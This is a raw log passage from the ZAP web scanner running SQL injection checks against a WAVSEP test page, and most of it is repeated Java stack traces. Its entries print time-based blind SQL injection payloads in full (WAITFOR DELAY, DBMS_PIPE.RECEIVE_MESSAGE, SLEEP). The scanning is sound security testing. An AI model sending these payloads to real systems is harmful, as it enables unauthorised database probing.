at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679890 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini);WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini);WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679891 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679892 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini');WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini');WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679893 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679894 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679894 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679895 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(116)||CHR(98)||CHR(105)||CHR(111),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(116)||CHR(98)||CHR(105)||CHR(111),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679896 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(69)||CHR(110)||CHR(77),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(69)||CHR(110)||CHR(77),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679897 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(78)||CHR(119)||CHR(90)||CHR(81),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(78)||CHR(119)||CHR(90)||CHR(81),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679898 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(87)||CHR(73)||CHR(102)||CHR(101),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(87)||CHR(73)||CHR(102)||CHR(101),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679899 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(97)||CHR(80)||CHR(121)||CHR(90),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(97)||CHR(80)||CHR(121)||CHR(90),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679900 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(111)||CHR(114)||CHR(99)||CHR(75),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(111)||CHR(114)||CHR(99)||CHR(75),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679901 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND (SELECT * FROM (SELECT(SLEEP(5)))ylOT) AND (2423=2423] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 